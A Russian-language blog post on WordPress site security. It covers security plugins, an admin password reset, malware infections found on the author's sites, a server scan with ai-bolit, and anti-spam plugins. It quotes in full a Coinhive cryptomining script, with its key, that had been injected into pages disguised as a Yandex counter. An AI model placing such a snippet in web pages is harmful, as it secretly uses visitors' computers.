/ Сайтостроение / Адаптивность / Безопасность сайта

Безопасность сайта

Рассмотрим различные аспекты связанные с безопасностью сайта. Данная тема становится все более актуальной, особенно когда мы сталкиваемся с разработкой крупного проекта.

Wordfence Security

Отличный плагин (более миллиона загрузок) по выявлению измененных файлов ядра и обеспечения сайта в целом. При обнаружении внештатной ситуации необходимо провести сканирование. Wordfence Security выявляет и показывает перечень потенциальных уязвимостей.

Защита входа в админку

Устанавливаем плагин Captcha by BestWebSoft. Тут все просто на всех формах взаимодействия с админкой (авторизация, регистрация, смена пароля и т.д.) появляется настраиваемая каптча.

Смена пароля в админку

Пароль можно изменить через phpMyAdmin. Заходим в БД, находим юзера в таблице wp_users. Включаем изменить на нужной строке, меняем пароль входа. !Редактируя строку user_pass обязательно нужно включить функцию MD5 (из выпадающего списка).

Заражение сайта вирусами

Буду описывать различные кейсы заражения сайтов вирусами и какие меры были предприняты.

Появление в functions кода, которого быть не должно

Недавно (06.12.2017) на группе сайтов происходили непонятные вещи. То ли сайт был заражен извне, то ли это я экспериментировал со скачанными на nulled плагинами.
Происходило следующее:

  • В файл (в начале) function добавлялся код
  • Были изменены файлы ядра: wp-config-sample.php, readme.html
  • Добавлены в ядро следующие файлы: wp-includes/wp-feed.php, wp-includes/wp-tmp.php, wp-includes/wp-vcd.php

Масштабное заражение и блокировка аккаунта

Недавно столкнулся с ситуацией, когда хостеры вовсе заблокировали аккаунт из-за того, что на нем были обнаружены вирусы. Хотя на данном аккаунте я делал довольно простой лэндинг.

Мне было предложено подключиться по SSH (через программу Putty) и просканировать сервер программой ai-bolit. Через SSH нужно было сделать небольшую последовательность команд, сначала:

Работая с программой Putty: в первом окне вводим адрес сервера и название сеанса, порт 22, выбор на SSH. Далее в командной строке вводим логин, а далее пароль. Пароль визуально не будет появляться — это нормально. Cntr + v в Putty не работает. Если мы скопировали данные в буфер обмена, вставляются они нажатием правой кнопки мыши.

mkdir ai && mkdir ai/reports && cd ai

этой командой по сути мы просто создаем директорию и переходим в нее. Параллельно, через файловый менеджер, загружаем во вновь созданную директорию ai скаченный с официального сайта ai-bolit.zip (AI-Bolit для сайтов). После этого запускаем следующую команду:

unzip ai-bolit.zip && php $HOME/ai/ai-bolit/ai-bolit.php --path=$HOME --report=$HOME/ai/reports/report.html --mode=2 --skip=jpg,png,gif,jpeg,JPG,PNG,GIF,bmp,xml,zip,rar,css,avi,mov

После того, как сканирование завершиться лог отчета можно посмотреть в папке ai/reports/report.html

Естественно, что многие файлы даже не зараженные вирусами ai-bolit будет считать потенциальной угрозой. Нам нужно выявлять и удалять по ФТП:

  • Файлы с непонятными названиями, например ksvqyhtd.php
  • Файлы с нормальными названиями, но которых в файлах ядра системы быть не должно
  • Очевидно измененные файлы: index.php, functions.php, .htaccess, wp-config.php, wp-settings.php

После того как я удалил или исправил очевидные зараженные вирусы, хостер включил сайты и уже изнутри с помощью плагина Wordfence Security было проведено сканирование. По результату обнаружились угрозы, которые в последствии были локализованы. Далее Wordfence Security продолжает работать как Firewall.

Причиной в этот раз, по всей видимости, снова стали эксперименты (не мои) со скаченными темами и плагинами, я обнаружил незарегистрированный WPBakery Visual Composer.

Скрипт по майнингу криптовалюты

Недавно обнаружил на нескольких сайтах (CMS modX) скрипт по майнингу криптовалюты, замаскированный под счетчик Яндекс.

<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
var miner = new CoinHive.User('MkQ129BWDFaoWndzmb7UMEJlFOzJcdKO', 'favicon');
miner.start();
</script>

Если в браузере открыта вкладка со страницей зараженной этим скриптом, компьютер начинает потреблять больше ресурсов и притормаживает. На сайтах WP пока данной проблемы не обнаружил.

Защита от СПАМа

Если ничего не делать, то рано или поздно на сайт начнет приходить куча СПАМ-комментариев и писем с форм обратной связи. От СПАМа в комментариях хорошо помогает плагин Anti-spam (100 000 установок), а от СПАМ-писем с Contact Form 7 борется дополнение Contact Form 7 Honeypot (100 000 установок). Anti-spam работает без каких-либо настроек и действий. Honeypot нужно добавить во все формы обратной связи (новое скрытое поле [honeypot honeypot-642] с настройками по умолчанию).

Плагин WP-SpamShield вызывает противоречия с ядром WP и не дает совершить изменения тем и плагинов. Обновления вызывают ошибку: Невозможно соединиться с сайтом для проверки кода на ошибки, был сделан откат изменений в PHP-коде. Вам нужно загрузить измененный PHP файл другим способом, например через FTP или SFTP.

Поделится информацией с друзьями

  • Комментарии
  • Вложения

Добавить комментарий

Пока нет комментариев. Будь первым!

Безопасность сайта
Разделение записей по алфавиту
Рекомендации для васРазделение записей по алфавитуOpttour.ru
Спасибо! Наш менеджер свяжется с Вами в течении 5 минут.